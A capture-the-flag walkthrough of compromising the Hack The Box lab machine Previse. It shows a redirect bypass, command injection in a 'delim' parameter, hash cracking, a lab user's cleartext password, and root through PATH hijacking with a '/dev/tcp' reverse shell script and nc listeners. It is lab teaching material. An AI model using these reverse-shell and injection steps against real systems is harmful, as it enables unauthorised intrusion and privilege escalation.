The new linux machine is called Previse on HTB and I’m going to root it today.
As usual I started the nmap scan and got this:
By checking the webpage on port 80 I found a simple login page nothing more
running the buster to check for any available directories I found
/css
/js
/nav.phpcss and js weren’t useful but when I opened nav.php I found this
Create account is the eye catcher here but it still redirects us to /login.php again time to check the request from another view
After trying some different ways and different links here is what I reached to:
After sending the request and finding this 302 request I was kinda confused but
After a lot of searching I found a way to get it /account.php and it’s to change the response header from 302 to 200 check this blog to know how to do it
Now after creating the account I’m able to access all directories above and I found sitebackup.zip in files
I downloaded it to check what does it contain and I found there some credentials
root username and it’s password (Must have a shell to use these credentials)
After a lot literally hours of searching and trying different ways to get in this machine I saw a parameter called delim in logs.php where I think we can inject with some code to get a reverse shell
Now we go to the /file_logs.php and intercept the request after pressing submit setting delim as comma
The request should be like this before injecting
Now we add out injector code in delim parameter…But first we need to start a server on our attacking machine and create a rev shell there
python3 -m http.server 9191Here is the request after injecting our code
Now we set our listener on the port we specified in the reverse shell then forward the request
nc -lvnp <port>
It worked and I got the shell I was looking for as www-data now we can use the credentials we found before for mysql database
You can find them again in the file called config.php
The credential were correct and we logged in successfully now search for any other credentials in this data base
show tables;
#this command will display the tables in our database
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)Here we got 2 tables accounts and files let’s check what is in accounts maybe we can find more credentials
mysql> SELECT * FROM accounts;
SELECT * FROM accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | far1s | $1$🧂llol$J.VmdoVZ4IjW4C57oRv1m0 | 2021-08-05 13:10:08 |
+----+----------+------------------------------------+---------------------+
2 rows in set (0.00 sec)Finally one more step forward now we have one more username which is m4lwhere and it’s password
Running hashcat and john the ripper and let them find this password for us using rockyou.txt
#cracking using john the ripper:
john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt m4lwherepasswd.txt#cracking using hashcathashcat -a 0 -m 500 m4lwherepasswd.txt /usr/share/wordlists/rockyou.txt
Both took approximately half an hour but hashcat was 3 minutes faster so we gonna meow tool won this time
Now we login via ssh as user m4lwhere
ssh m4lwhere@previse.htb password: ilovecody112235!
Here is the first flag now we must find a way to be a root and get the 2nd flag
Cool we can run access_backup.sh as root
Reading this bash file we can see here that this file run with cron and it runs as root
gzip -c “write on standard output, keep original files unchanged”
After some searching I found something called path injection and it could be useful in our situation it’s a bit complex to understand but practice makes perfect.
First we need to be in a directory where we can have more privileges like /tmp
Now we create our file called gzip and add a bash shell in there so it should be like:
#!/bin/bash
/bin/sh -i >& /dev/tcp/<IP>/2424 0>&1Then we edit the default path to $pwd:.:$PATH
export PATH=$(pwd):.:$PATHAll done?.. don’t forget to change the gzip permissions chmod +x gzip now we are ready run the listener on another terminal and run the access_backup.sh as sudo.
attacking machine : nc -lvnp <PORt>
ssh shell : sudo /opt/scripts/access_backup.sh
And Bingo congrats on rooting the machine …
